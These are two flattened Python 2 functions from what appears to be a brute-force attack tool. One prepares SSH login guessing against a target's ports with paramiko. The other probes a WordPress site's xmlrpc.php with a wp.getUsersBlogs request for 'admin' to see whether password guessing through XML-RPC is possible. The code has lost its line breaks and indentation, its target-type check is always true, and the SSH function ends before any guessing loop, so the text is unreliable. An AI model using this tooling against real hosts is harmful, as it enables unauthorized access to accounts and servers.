def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN': threads = [] max = thread_number total_req = len(users) * len(passwds) for port in ports: # test ssh trying = 0 portflag = True exit = 0 while 1: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if timeout_sec is not None: ssh.connect(target, username='', password='', timeout=timeout_sec) else: ssh.connect(target, username='', password='') exit = 0 break except paramiko.ssh_exception.AuthenticationException, ssherr: if 'Authentication failed.' in ssherr: break else: exit += 1 if exit is 3: error( 'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (target, port, str(num), str(total))) portflag = False break time.sleep(0.1) except: exit += 1 if exit is 3: error( 'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (target, port, str(num), str(total))) portflag = False break time.sleep(0.1)
def test(target, port, retries, timeout_sec, headers, socks_proxy, verbose_level, trying, total_req, total, num, language): if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy( socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo n = 0 while 1: try: headers = {} if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target postdata = '''<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string></string></value></param></params></methodCall>''' try: req = requests.post(target + '/xmlrpc.php', data=postdata, headers=headers) #print (target) if re.search('<int>403</int>', req.text): return True else: return False except: return False except Exception as err: return False